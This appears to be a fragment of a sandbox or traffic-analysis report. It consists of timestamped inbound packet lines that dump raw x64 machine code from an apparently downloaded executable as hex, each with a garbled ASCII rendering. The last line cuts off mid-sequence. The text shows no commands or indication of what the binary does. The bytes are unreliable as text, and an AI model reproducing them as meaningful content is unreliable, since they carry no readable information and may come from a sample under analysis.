2023-11-18 09:02:42 UTC	9097	IN	Data Raw: e8 11 ef 02 00 4c 8d 4f 01 44 8b c0 48 8d 15 63 3c 10 00 eb 68 b8 01 00 00 00 4c 8d 4f 01 44 8b c0 48 8d 15 4e 3c 10 00 eb 53 80 7b 29 00 77 63 fe 43 25 48 8d 0d 9c ae f9 ff 0f b6 07 c7 44 24 30 00 00 00 00 44 0f b6 84 08 a0 69 17 00 41 83 f8 1e 77 0f 48 8d 54 24 30 48 8b cf e8 b5 ee 02 00 eb 05 b8 01 00 00 00 44 8b c0 4c 8b cf 48 8d 05 61 ae f9 ff 4a 8b 94 e8 00 e4 16 00 49 8b ce e8 41 4e 0e 00 ff c5 48 ff c6 49 3b f4 0f 8c 36 ff ff ff 4c 8b 6c 24 48 8b 7c 24 34 48 8d 15 f7 3b 10 00 49 8b ce e8 1b 4e 0e 00 49 8b ce e8 73 54 0e 00 48 8b f0 48 85 c0 75 2d 8d 78 07 4c 8b 74 24 38 48 8b ce e8 5b 7f 0e 00 85 ff 0f 85 9e 00 00 00 0f b6 4b 25 0f b6 c1 d0 e8 88 43 24 3c 01 73 5d 8d 47 02 eb 6e 3b ef 7d 22 48 8d 15 43 3b 10 00 48 8d 0d d4 c1 0f 00 e8 b7 4f 0e 00 Data Ascii: LODHc<hLODHN<S{)wcC%HD$0DiAwHT$0HDLHaJIANHI;6Ll$H\|$4H;INIsTHHu-xLt$8H[K%C$<s]Gn;}"HC;HO
2023-11-18 09:02:42 UTC	9103	IN	Data Raw: 4b 2c 8b 53 2c 8b c2 49 8b 4e 18 c1 f8 08 88 01 88 51 01 41 c7 46 14 01 00 00 00 48 8b 7b 60 48 85 ff 0f 84 99 00 00 00 85 f6 75 0d 48 8b d7 48 8b cb e8 6f 01 00 00 8b f0 48 8b 47 20 ff 4b 54 48 89 43 60 83 3d db f6 12 00 00 74 5e 48 8b 0d 92 2c 13 00 48 85 c9 74 06 ff 15 47 f7 12 00 48 8b cf ff 15 f6 f6 12 00 48 ff 0d 3f 2d 13 00 48 8b cf 48 63 d0 48 29 15 ea 2c 13 00 ff 15 cc f6 12 00 48 8b 0d 5d 2c 13 00 48 85 c9 74 26 ff 15 22 f7 12 00 eb 1e 45 33 c9 48 8b d7 48 8b cb e8 22 0b 00 00 8b f0 e9 8e fe ff ff 48 8b cf ff 15 9a f6 12 00 48 8b 7b 60 48 85 ff 0f 85 67 ff ff ff 49 8b d6 48 8b cb 85 f6 75 07 e8 e6 4e 00 00 eb 07 e8 df 4e 00 00 8b c6 48 8b 5c 24 48 48 8b 6c 24 50 48 83 c4 20 41 5e 5f 5e c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 Data Ascii: K,S,INQAFH{`HuHHoHG KTHC`=t^H,HtGHH?-HHcH),H],Ht&"E3HH"HH{`HgIHuNNH\$HHl$PH A^_^H\$Ht$
2023-11-18 09:02:42 UTC	9107	IN	Data Raw: 57 01 e8 e7 f8 0a 00 48 8b 8e a0 00 00 00 e8 4b 0a 0b 00 83 f8 64 75 37 48 8b 8e a0 00 00 00 33 d2 e8 d8 01 0b 00 48 8b d0 48 8b c5 48 85 ed 74 0e 48 39 50 08 74 18 48 8b 00 48 85 c0 75 f2 4c 8b cb 45 33 c0 48 8b ce e8 f1 41 00 00 8b f8 48 8b 8e a0 00 00 00 e8 23 1c 0b 00 85 c0 75 0e 8b c7 85 ff 75 08 48 83 3b 00 41 0f 44 c6 48 8b 1b 85 c0 0f 84 66 ff ff ff 48 8b 7c 24 30 48 8b 5c 24 38 48 8b 6c 24 40 48 8b 74 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec c8 00 00 00 48 8b 05 85 c6 12 00 48 33 c4 48 89 84 24 b8 00 00 00 48 8b 42 18 4c 8d 7a 18 44 89 4c 24 44 4d 8b e0 4c 89 44 24 48 48 8b f2 48 8b f9 c7 44 24 40 00 00 00 00 44 0f b6 70 02 0f b6 40 03 41 c1 e6 08 44 03 f0 45 8d 6e 01 41 8b dd 48 Data Ascii: WHKdu7H3HHHtH9PtHHuLE3HAH#uuH;ADHfH\|$0H\$8Hl$@Ht$HH A^@SUVWATAUAVAWHHH3H$HBLzDL$DMLD$HHHD$@Dp@ADEnAH
2023-11-18 09:02:42 UTC	9123	IN	Data Raw: 0a 00 48 8b cb 89 77 14 e8 71 dc 0a 00 ba 02 00 00 00 48 8b cb 8b f0 e8 82 bb 0a 00 85 c0 75 12 48 8b 0b 48 8b 49 18 48 85 c9 74 06 ff 15 8c a6 12 00 48 83 7f 08 00 48 8b 5c 24 40 75 49 85 f6 75 45 48 8b 4d 18 e8 73 6b 02 00 8b c8 48 89 47 08 b8 af 7e d0 51 f7 e1 8b c1 2b c2 d1 e8 03 c2 c1 e8 06 6b c0 61 2b c8 48 63 c1 48 8d 0c c5 00 00 00 00 48 8b 84 29 c0 00 00 00 48 89 47 20 48 89 bc 29 c0 00 00 00 48 8b 6c 24 48 8b c6 48 8b 74 24 50 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 44 0f b6 49 27 48 8b fa 8b 41 20 4c 8b d1 83 e8 04 99 41 f7 f9 4c 8b 4f 18 8b f0 41 0f b6 59 02 41 0f b6 49 03 c1 e3 08 03 d9 3b d8 7d 27 44 8b cb 48 8b d7 49 8b ca e8 c5 00 00 00 48 8b 4f 18 8d 53 Data Ascii: HwqHuHHIHtHH\$@uIuEHMskHG~Q+ka+HcHH)HG H)Hl$HHt$PH0_H\$Ht$WH DI'HA LALOAYAI;}'DHIHOS
2023-11-18 09:02:42 UTC	9131	IN	Data Raw: 8b 54 24 68 45 33 c9 4c 89 4b 30 48 8d 05 ac 2a 0f 00 48 89 43 10 b8 02 08 00 00 66 89 43 08 44 89 4b 0c c6 43 0a 01 85 ff 0f 89 76 03 00 00 48 8b 43 28 48 85 c0 74 16 48 8b 80 60 01 00 00 48 85 c0 74 0a ff 40 30 c7 40 18 12 00 00 00 48 8b ca e8 20 af 0a 00 e9 4a 03 00 00 48 89 b4 24 58 01 00 00 b9 c0 ff ff ff 39 8d c0 00 00 00 b8 40 00 00 00 4c 89 a4 24 50 01 00 00 be 01 00 00 00 0f 4d 8d c0 00 00 00 3b c8 4c 89 b4 24 48 01 00 00 44 8b b5 b8 00 00 00 0f 4f c8 89 4c 24 5c 89 74 24 54 4d 8b e1 4c 89 4c 24 78 85 c9 78 0c 8d 41 ff 03 c6 99 f7 fe 8b c8 eb 02 f7 d9 48 63 d6 49 8b c1 48 89 44 24 70 48 89 55 a8 89 4c 24 50 85 f6 0f 8e f7 00 00 00 48 8d 7d d0 66 66 0f 1f 84 00 00 00 00 00 45 33 c0 83 ce ff 41 8b d9 4c 89 07 4c 89 47 08 4c 89 47 10 45 39 47 30 0f Data Ascii: T$hE3LK0H*HCfCDKCvHC(HtH`Ht@0@H JH$X9@L$PM;L$HDOL$\t$TMLL$xxAHcIHD$pHUL$PH}ffE3ALLGLGE9G0
2023-11-18 09:02:42 UTC	9141	IN	Data Raw: 0f b6 4a 02 41 8b c0 c1 e1 0e 25 ff 3f 00 00 44 8b c1 44 0b c0 41 0f ba e0 15 72 16 b8 03 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 41 0f b6 4a 03 41 8b c0 c1 e1 15 25 ff ff 1f 00 44 8b c1 44 0b c0 41 0f ba e0 1c 72 16 b8 04 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 41 0f b6 4a 04 41 8b c0 25 ff ff ff 0f 83 e1 07 c1 e1 1c 44 8b c1 44 0b c0 b8 05 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 44 0f b6 c0 b8 01 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 85 c9 74 13 80 79 01 00 c6 01 00 75 0a 80 79 02 00 0f 84 f8 cf 0d 00 c3 cc cc cc cc cc cc cc 48 63 41 04 48 8d 51 1c 4c 8b c0 c7 41 08 01 00 00 00 83 c0 02 49 c1 e0 02 4c 63 c8 4a 8d 0c 89 48 Data Ascii: JA%?DDArIIA@HcHAJA%DDArIIA@HcHAJA%DDIIA@HcHDIIA@HcHHtyuyHcAHQLAILcJH
2023-11-18 09:02:42 UTC	9149	IN	Data Raw: 02 00 00 01 00 00 00 85 db 0f 85 87 02 00 00 45 33 c9 48 c7 45 c8 00 00 00 00 4c 8d 45 c8 49 8b ce 8d 53 08 e8 45 89 00 00 8b d8 85 c0 75 34 48 8b 5d c8 4c 8d 47 01 48 8b cb 8d 50 01 e8 fc 4e 0a 00 48 8b cb e8 64 60 0a 00 33 d2 48 8b cb e8 9a 58 0a 00 48 8b cb 44 8b e0 e8 6f 72 0a 00 8b d8 eb 04 44 8b 65 b8 45 85 e4 74 14 83 7d 38 00 0f 84 8b 00 00 00 41 83 fc 01 0f 85 81 00 00 00 45 33 c9 4c 8d 45 d0 49 8b ce 48 ff c7 41 8d 51 0f e8 d8 88 00 00 8b d8 85 c0 75 61 48 8b 5d d0 4c 8d 47 01 48 8b cb 8d 50 01 e8 8f 4e 0a 00 48 c1 ef 0a ba 02 00 00 00 48 8b cb 4c 8d 47 01 49 c1 e0 0a e8 76 4e 0a 00 48 8b cb 33 ff e8 dc 5f 0a 00 83 f8 64 75 11 33 d2 48 8b cb e8 1d 55 0a 00 83 f8 05 40 0f 94 c7 48 8b cb e8 de 71 0a 00 8b d8 85 ff 74 07 83 8e c8 02 00 00 02 48 8b Data Ascii: E3HELEISEu4H]LGHPNHd`3HXHDorDeEt}8AE3LEIHAQuaH]LGHPNHHLGIvNH3_du3HU@HqtH
2023-11-18 09:02:42 UTC	9159	IN	Data Raw: 8b 41 10 45 33 f6 44 8b 59 20 48 8b d9 41 8b f6 48 85 c0 74 0c 45 85 db 74 07 48 ff c0 48 89 41 10 4c 63 51 0c 44 8b 49 08 48 89 6c 24 40 48 89 7c 24 48 4c 89 64 24 50 4c 89 7c 24 58 45 3b d1 7c 0b 4c 89 31 41 8b c6 e9 0b 02 00 00 41 b8 02 00 00 00 45 8d 60 ff 45 85 db 0f 84 90 00 00 00 48 8b 01 4a 8d 14 10 42 0f b6 04 10 84 c0 79 74 0f b6 72 01 c1 e6 07 0f b6 c0 83 e0 7f 0b f0 0f ba e6 0e 72 05 41 8b c0 eb 60 0f b6 4a 02 8b c6 c1 e1 0e 25 ff 3f 00 00 8b f1 0b f0 0f ba e6 15 72 07 b8 03 00 00 00 eb 41 0f b6 4a 03 8b c6 c1 e1 15 25 ff ff 1f 00 8b f1 0b f0 0f ba e6 1c 72 07 b8 04 00 00 00 eb 22 0f b6 4a 04 8b c6 83 e1 07 25 ff ff ff 0f c1 e1 1c 8b f1 0b f0 b8 05 00 00 00 eb 06 0f b6 f0 41 8b c4 41 03 c2 89 43 0c 48 8b 03 48 63 53 0c 48 03 d0 0f b6 02 84 c0 Data Ascii: AE3DY HAHtEtHHALcQDIHl$@H\|$HLd$PL\|$XE;\|L1AAE`EHJBytrrA`J%?rAJ%r"J%AACHHcSH
2023-11-18 09:02:42 UTC	9168	IN	Data Raw: 85 ff 48 8b ce 0f 48 f8 48 63 d7 e8 56 62 0d 00 48 85 c0 74 16 48 89 43 18 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b 5c 24 30 b8 07 00 00 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc 45 33 d2 c7 41 28 01 00 00 00 45 8b ca 44 89 51 0c 44 39 51 08 7e 3d 45 8b c2 66 0f 1f 44 00 00 48 8b 01 4d 8d 40 08 41 ff c1 49 8b 54 00 f8 4c 89 52 70 48 8b 01 49 8b 54 00 f8 44 89 52 78 48 8b 01 49 8b 54 00 f8 4c 89 92 80 00 00 00 44 3b 49 08 7c cc 33 c0 c3 cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 4c 24 08 56 57 41 54 41 55 41 57 48 83 ec 50 4c 63 bc 24 a0 00 00 00 4c 8d 2d 26 1d 00 00 48 63 7a 08 48 8b f1 48 8d 0d b8 1c 00 00 4d 8b c1 45 8b cf 4c 8b e2 80 be cf 01 00 00 00 4c 0f 45 e9 48 8b ce 4c 89 6c 24 28 e8 67 01 00 00 Data Ascii: HHHcVbHtHC3H\$0Ht$8H _H\$0Ht$8H _E3A(EDQD9Q~=EfDHM@AITLRpHITDRxHITLD;I\|3LL$ DD$HL$VWATAUAWHPLc$L-&HczHHMELLEHLl$(g
2023-11-18 09:02:42 UTC	9173	IN	Data Raw: 00 00 41 03 f0 41 03 f2 8b 81 c8 01 00 00 3b f0 7e 45 48 39 7b 20 0f 85 3f 01 00 00 3b f0 7e 37 e8 71 af 01 00 85 c0 75 0f 85 f6 7e 0b 48 63 ce e8 51 50 0d 00 48 8b f8 48 89 7b 40 48 85 ff 0f 84 61 02 00 00 4c 8b 9c 24 a8 00 00 00 44 8b 54 24 30 4c 8b 4c 24 48 48 83 7b 20 00 74 35 4d 63 c2 49 8b d1 4c 03 43 40 49 8b c8 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 c2 48 c1 ea 07 0c 80 88 01 48 ff c1 48 85 d2 75 ed 80 61 ff 7f 41 2b c8 44 03 d1 4c 8b 44 24 50 4d 63 ca 49 8b c8 4c 03 4b 40 49 8b d1 90 0f b6 c1 48 c1 e9 07 0c 80 88 02 48 ff c2 48 85 c9 75 ed 80 62 ff 7f 41 2b d1 44 03 d2 48 8b 54 24 48 49 63 ca 49 03 d3 48 03 4b 40 44 89 54 24 30 e8 7a 9d f8 ff 8b 44 24 38 03 44 24 30 ff 43 18 83 bc 24 a0 00 00 00 00 89 43 38 74 4d 39 6b 2c 7d 22 48 8b 4b 30 8d 3c Data Ascii: AA;~EH9{ ?;~7qu~HcQPHH{@HaL$DT$0LL$HH{ t5McILC@IfffHHHuaA+DLD$PMcILK@IHHHubA+DHT$HIcIHK@DT$0zD$8D$0C$C8tM9k,}"HK0<
2023-11-18 09:02:42 UTC	9179	IN	Data Raw: 85 c9 74 07 e8 5d 39 09 00 eb 5d 48 83 bb d8 01 00 00 00 75 26 48 8b 53 28 48 8d 0d a6 ec 0e 00 e8 81 08 0d 00 48 89 83 d8 01 00 00 48 85 c0 75 0a b8 07 00 00 00 e9 08 01 00 00 4c 8b 83 d8 01 00 00 4c 8d 0d 89 ec 0e 00 48 8b 53 20 48 8b 4b 18 4c 89 74 24 30 c7 44 24 28 00 00 00 00 48 89 7c 24 20 e8 2e 3d 09 00 48 89 74 24 60 8b d8 85 c0 0f 85 ba 00 00 00 49 8b 06 48 85 c0 74 0b 48 83 78 18 00 74 04 8b 30 eb 02 33 f6 89 75 00 4d 85 ff 0f 84 a4 00 00 00 8d 5e 14 e8 56 98 01 00 85 c0 74 0d 33 ff 49 89 3f 8d 5f 07 e9 8b 00 00 00 85 db 7e 0d 48 63 cb e8 29 39 0d 00 48 8b f8 eb 02 33 ff 48 85 ff 75 08 8d 5f 07 49 89 3f eb 6b 48 8b 84 24 80 00 00 00 48 85 c0 74 0f 81 fe 00 40 00 00 7e 07 be 00 10 00 00 89 30 49 8b 0e 48 8d 05 ef 3b 0b 00 45 33 c9 48 89 44 24 20 Data Ascii: t]9]Hu&HS(HHHuLLHS HKLt$0D$(H\|$ .=Ht$`IHtHxt03uM^Vt3I?_~Hc)9H3Hu_I?kH$Ht@~0IH;E3HD$
2023-11-18 09:02:42 UTC	9190	IN	Data Raw: 80 3c 01 00 74 0b 8d 42 01 89 43 14 41 3b c2 7c d7 8b 43 14 3b c6 7f 16 41 3b c2 7c 99 b8 65 00 00 00 48 83 c4 20 41 5d 41 5c 5f 5e 5b c3 48 89 6c 24 50 8b e8 2b ee 4c 89 74 24 60 4c 89 7c 24 68 3b 6b 28 7e 30 4c 8b 7b 20 44 8d 75 14 44 89 73 28 e8 5f 6b 01 00 85 c0 75 71 45 85 f6 49 8b cf 44 0f 48 f0 49 63 d6 e8 79 07 0d 00 48 85 c0 74 5a 48 89 43 20 4c 8b 43 20 48 8d 0c 37 4d 8b cd 8b d5 e8 5e 00 00 00 48 8b 43 20 48 8b 4c 24 58 48 89 01 48 8b 44 24 70 41 89 34 24 8b 4b 14 89 08 48 8b 44 24 78 8b 4b 18 89 08 ff 43 18 33 c0 4c 8b 74 24 60 48 8b 6c 24 50 4c 8b 7c 24 68 48 83 c4 20 41 5d 41 5c 5f 5e 5b c3 b8 07 00 00 00 eb de cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 57 41 55 48 81 ec 80 00 00 00 48 8b 05 8d 78 11 00 48 33 c4 48 89 44 Data Ascii: <tBCA;\|C;A;\|eH A]A\_^[Hl$P+Lt$`L\|$h;k(~0L{ DuDs(_kuqEIDHIcyHtZHC LC H7M^HC HL$XHHD$pA4$KHD$xKC3Lt$`Hl$PL\|$hH A]A\_^[@SWAUHHxH3HD
2023-11-18 09:02:42 UTC	9196	IN	Data Raw: a1 0f 1f 44 00 00 41 0f b6 01 84 c0 74 2e 0f be c0 83 e8 61 48 63 c8 42 0f be 14 11 83 fa 02 7d 09 b8 01 00 00 00 2b c2 eb 09 49 8d 49 01 e8 53 01 00 00 85 c0 74 05 49 ff c1 eb ca 41 80 39 00 75 0a b8 01 00 00 00 48 83 c4 28 c3 49 8b c9 e8 32 01 00 00 85 c0 74 0f 49 ff c1 49 8b c9 e8 23 01 00 00 85 c0 75 f1 33 c0 41 38 01 0f 94 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 4c 8b c9 4c 8d 15 aa fa 0e 00 66 90 41 0f b6 01 84 c0 74 2e 0f be c0 83 e8 61 48 63 c8 42 0f be 14 11 83 fa 02 7d 09 b8 01 00 00 00 2b c2 eb 09 49 8d 49 01 e8 c3 00 00 00 85 c0 74 05 49 ff c1 eb ca 41 80 39 00 75 07 33 c0 48 83 c4 28 c3 41 0f b6 01 84 c0 74 4a 0f be c0 83 e8 61 48 63 c8 42 0f be 04 11 83 f8 02 7c 2e 41 0f b6 41 01 84 c0 74 29 0f be Data Ascii: DAt.aHcB}+IIStIA9uH(I2tII#u3A8H(H(LLfAt.aHcB}+IItIA9u3H(AtJaHcB\|.AAt)
2023-11-18 09:02:42 UTC	9202	IN	Data Raw: 84 24 c0 00 00 00 8b 8c 24 b0 00 00 00 41 2b ce 89 08 45 85 ff 74 21 49 8b cd e8 97 f4 ff ff 49 8b cc e8 8f f4 ff ff 48 8b 84 24 b8 00 00 00 48 c7 00 00 00 00 00 eb 0b 48 8b 84 24 b8 00 00 00 4c 89 28 48 8b 74 24 58 41 8b c7 48 8b 6c 24 60 48 83 c4 68 41 5f 41 5e 41 5d 41 5c 5f 5b c3 cc cc cc cc cc cc cc 48 83 ec 28 48 83 7a 08 00 4c 8b ca 4c 8b d9 74 38 49 8b c8 e8 77 00 00 00 0f 1f 80 00 00 00 00 4d 8b 51 08 41 8b 12 83 fa 01 75 04 8b ca eb 0b 33 c9 83 fa 04 0f 95 c1 83 c1 02 3b c8 7f 0a 49 83 7a 08 00 4d 8b ca 75 d7 49 8b 41 08 48 85 c0 74 19 4c 89 40 18 49 8b 41 08 49 89 40 08 4d 89 48 10 4d 89 41 08 48 83 c4 28 c3 4d 89 48 10 4d 89 41 08 4d 89 03 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 11 83 fa 01 75 03 8b c2 Data Ascii: $$A+Et!IIH$HH$L(Ht$XAHl$`HhA_A^A]A\_[H(HzLLt8IwMQAu3;IzMuIAHtL@IAI@MHMAH(MHMAMH(u
2023-11-18 09:02:42 UTC	9213	IN	Data Raw: 4c 8d 45 ef 48 8d 55 07 48 8d 4d f7 e8 b5 63 00 00 48 8b 7d f7 eb 6d 41 0f b6 14 24 4d 8b c4 84 d2 74 17 0f 1f 00 80 e2 80 49 ff c0 0f b6 ca 41 0f b6 10 0f b6 c2 0a c1 75 ec 45 2b c4 49 8b d4 eb 2e 48 39 75 e7 74 75 0f b6 16 4c 8b c6 84 d2 74 18 0f 1f 40 00 80 e2 80 49 ff c0 0f b6 ca 41 0f b6 10 0f b6 c2 0a c1 75 ec 44 2b c6 48 8b d6 41 ff c0 48 8b cf 49 63 d8 4c 8b c3 e8 75 ff f7 ff 48 03 fb 41 2b 7e 28 41 2b fd 78 1f 41 8b 46 30 3b f8 7f 17 2b c7 48 63 cf 49 03 4e 28 33 d2 4c 63 c0 e8 8e 07 f8 ff 41 89 7e 30 4d 8b 7e 28 41 8b 46 50 4c 89 7d 7f 89 45 6f eb 07 4c 8b 7d 7f 45 33 ed 48 8b 4d ff 48 8b 49 08 48 89 4d ff 45 85 ed 0f 85 84 fe ff ff 4c 8b 75 67 49 8b 46 18 4d 8b 76 10 48 8b 48 20 48 8b 59 28 8b 41 50 48 89 5d 7f 89 45 6f 4d 85 f6 0f 84 7d 01 00 Data Ascii: LEHUHMcH}mA$MtIAuE+I.H9utuLt@IAuD+HAHIcLuHA+~(A+xAF0;+HcIN(3LcA~0M~(AFPL}EoL}E3HMHIHMELugIFMvHH HY(APH]EoM}
2023-11-18 09:02:42 UTC	9219	IN	Data Raw: e1 05 48 63 7c 0d af 8d 5f 08 e8 87 fa 00 00 85 c0 0f 85 ac 01 00 00 85 db 0f 8e a4 01 00 00 48 63 db 48 8d 43 ff 48 3d fe fe ff 7f 0f 87 91 01 00 00 44 39 2d 1d 27 11 00 74 37 48 8b 0d d4 5c 11 00 48 85 c9 74 06 ff 15 89 27 11 00 48 8d 54 24 50 8b cb e8 9d 9b 0c 00 48 8b 0d b6 5c 11 00 48 85 c9 74 06 ff 15 7b 27 11 00 48 8b 5c 24 50 eb 10 8b cb ff 15 fc 26 11 00 48 8b d8 48 89 44 24 50 48 85 db 0f 84 38 01 00 00 8d 4f 01 4c 63 c1 8b 4e 50 ff c9 48 63 d1 48 8b cb 48 c1 e2 05 48 8b 54 15 a7 e8 ac e8 f7 ff 33 c9 45 33 ff 48 89 0c 1f 8b 4e 50 8d 41 ff 85 c0 7e 6a 48 8d 7d a7 0f 1f 44 00 00 83 7f f0 00 75 49 48 8b 07 41 2b cf 48 89 45 87 41 b9 01 00 00 00 48 8d 44 24 58 48 89 5c 24 58 48 89 44 24 28 45 33 c0 48 8d 45 87 48 89 5c 24 40 8d 51 ff 48 89 44 24 20 Data Ascii: Hc\|_HcHCH=D9-'t7H\Ht'HT$PH\Ht{'H\$P&HHD$PH8OLcNPHcHHHT3E3HNPA~jH}DuIHA+HEAHD$XH\$XHD$(E3HEH\$@QHD$
2023-11-18 09:02:42 UTC	9235	IN	Data Raw: ff ff 1f 00 c1 e0 15 49 83 c0 03 0b c1 0f ba e0 1c 72 0b 44 8b c8 41 b8 04 00 00 00 eb 39 44 8b c8 b9 1c 00 00 00 41 81 e1 ff ff ff 0f 66 0f 1f 84 00 00 00 00 00 41 0f b6 10 49 ff c0 8b c2 83 e0 7f 48 d3 e0 4c 03 c8 84 d2 79 08 83 c1 07 83 f9 3f 7e e2 44 2b c6 48 8b 7d 60 41 bf 01 00 00 00 8b 4d 48 48 8b c7 48 8b 55 50 49 2b c1 49 03 f9 4d 63 f0 4c 03 f6 85 c9 4c 89 75 b0 48 0f 45 f8 48 89 7d 60 48 89 7d c0 e9 2f fc ff ff 33 c0 49 89 45 00 48 8b 45 d8 eb 0e 48 8b 4d d8 e8 13 59 0c 00 33 c0 45 33 ed 48 8b 4d 70 44 2b e8 48 89 01 48 8b 45 78 44 89 28 8b 45 58 eb 05 b8 07 00 00 00 48 83 c4 78 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 8b d9 85 d2 74 13 41 83 39 00 74 0d 49 8b 00 4c 8b 54 24 Data Ascii: IrDA9DAfAIHLy?~D+H}`AMHHHUPI+IMcLLuHEH}`H}/3IEHEHMY3E3HMpD+HHExD(EXHxA_A^A]A\_^[]H\$HtA9tILT$
2023-11-18 09:02:42 UTC	9251	IN	Data Raw: 5d 30 7e 20 66 90 4c 8b ce 4c 8d 05 76 bd 0d 00 48 8d 54 24 40 49 8b ce e8 49 03 00 00 ff c3 3b 5d 30 7c e2 48 83 7d 58 00 48 8b 6c 24 50 48 8b 74 24 28 48 8b 5c 24 48 74 14 4c 8d 05 4d bd 0d 00 49 8b ce 48 8d 54 24 40 e8 18 03 00 00 4c 8b 74 24 20 48 85 ff 74 64 83 3d f7 a6 10 00 00 74 52 48 8b 0d ae dc 10 00 48 85 c9 74 06 ff 15 63 a7 10 00 48 8b cf ff 15 12 a7 10 00 48 ff 0d 5b dd 10 00 48 8b cf 48 63 d0 48 29 15 06 dd 10 00 ff 15 e8 a6 10 00 48 8b 0d 79 dc 10 00 48 85 c9 74 1a ff 15 3e a7 10 00 48 8b 44 24 40 48 83 c4 30 5f c3 48 8b cf ff 15 c2 a6 10 00 48 8b 44 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 57 41 54 48 83 ec 40 48 89 5c 24 68 4c 8d 25 23 4b 0d 00 33 db 48 89 74 24 70 49 8b e8 4c 89 74 24 38 48 8b f9 48 89 Data Ascii: ]0~ fLLvHT$@II;]0\|H}XHl$PHt$(H\$HtLMIHT$@Lt$ Htd=tRHHtcHH[HHcH)HyHt>HD$@H0_HHD$@H0_@UWATH@H\$hL%#K3Ht$pILt$8HH
2023-11-18 09:02:42 UTC	9267	IN	Data Raw: 0b 8b 41 54 23 41 50 48 83 c4 38 c3 b8 07 00 00 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b d9 48 85 c9 75 12 48 8d 05 b7 74 0e 00 48 8b 5c 24 30 48 83 c4 20 5f c3 0f b6 41 6d 3c ba 74 32 3c 76 74 2e 3c 6d 74 2a 4c 8d 05 2d 0c 0d 00 b9 15 00 00 00 48 8d 15 e1 0b 0d 00 e8 14 a8 0b 00 48 8d 05 6d 7d 0e 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 8b 49 18 48 85 c9 74 06 ff 15 43 67 10 00 80 7b 63 00 74 0c 48 8d 3d 56 74 0e 00 e9 9a 00 00 00 48 8b 8b a8 01 00 00 48 85 c9 74 37 0f b7 51 08 41 b8 02 02 00 00 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 02 75 06 48 8b 79 10 eb 0f f6 c2 01 75 0f b2 02 e8 46 28 09 00 48 8b f8 48 85 ff 75 25 8b 4b 50 e8 56 1c 00 00 8b 53 50 4c 8b c0 48 8b cb e8 68 96 0b 00 48 Data Ascii: AT#APH8H8H\$WH HHuHtH\$0H _Am<t2<vt.<mt*L-HHm}H\$0H _HIHtCg{ctH=VtHHt7QAfA#fA;uyuHyuF(HHu%KPVSPLHhH
2023-11-18 09:02:42 UTC	9283	IN	Data Raw: 84 38 00 f9 16 00 46 74 15 0f b6 42 01 48 8d 52 01 41 ff c3 f6 84 38 00 f9 16 00 46 75 eb 41 8d 41 bd 83 f8 31 0f 87 df 02 00 00 48 98 0f b6 84 07 3c 3b 09 00 8b 94 87 2c 3b 09 00 48 03 d7 ff e2 41 83 fb 06 0f 85 bf 02 00 00 45 8b c3 4c 8d 15 6d 34 0d 00 4c 8b c9 41 0f b6 01 41 ff c8 84 c0 74 26 0f b6 d0 41 0f b6 02 0f b6 84 38 70 13 17 00 38 84 3a 70 13 17 00 75 0e 49 ff c1 49 ff c2 45 85 c0 7f d2 41 ff c8 45 85 c0 78 20 41 0f b6 02 0f b6 94 38 70 13 17 00 41 0f b6 01 0f b6 84 38 70 13 17 00 3b c2 0f 85 5c 02 00 00 41 8d 43 ff 41 b0 04 48 63 d0 48 03 ca e9 be fe ff ff 41 83 fb 07 75 78 45 8b c3 4c 8d 15 de 25 0d 00 4c 8b c9 0f 1f 00 41 0f b6 11 41 ff c8 84 d2 74 26 41 0f b6 02 0f b6 d2 0f b6 84 38 70 13 17 00 38 84 3a 70 13 17 00 75 0e 49 ff c1 49 ff c2 Data Ascii: 8FtBHRA8FuAA1H<;,;HAELm4LAAt&A8p8:puIIEAEx A8pA8p;\ACAHcHAuxEL%LAAt&A8p8:puII
2023-11-18 09:02:42 UTC	9299	IN	Data Raw: 48 8b 4d 7f 88 44 24 30 48 89 74 24 28 c7 44 24 20 55 00 00 00 e8 ec 68 00 00 48 89 43 d8 e9 1b fe ff ff 0f b6 43 08 4c 8b 4b c8 44 8b 43 c0 8b 53 90 48 8b 4d 7f 88 44 24 30 48 8b 43 f8 48 89 44 24 28 8b 43 f0 89 44 24 20 e8 b7 68 00 00 48 89 43 90 e9 e6 fd ff ff 0f 10 43 08 0f 11 43 08 e9 d9 fd ff ff 0f b7 43 ea 33 f6 89 45 df 48 89 75 e7 0f 10 45 df 0f 11 43 f0 e9 bf fd ff ff 0f b7 43 02 89 45 df 48 8b 43 f0 48 89 45 e7 0f 10 45 df 0f 11 43 f0 e9 a3 fd ff ff c6 43 20 00 e9 9a fd ff ff 0f b6 43 08 88 43 f0 e9 8e fd ff ff 0f b6 43 ea 88 43 f0 e9 82 fd ff ff 0f b6 43 02 88 43 08 e9 76 fd ff ff 48 8b 4b 08 48 85 c9 74 15 48 8b 43 f0 48 89 41 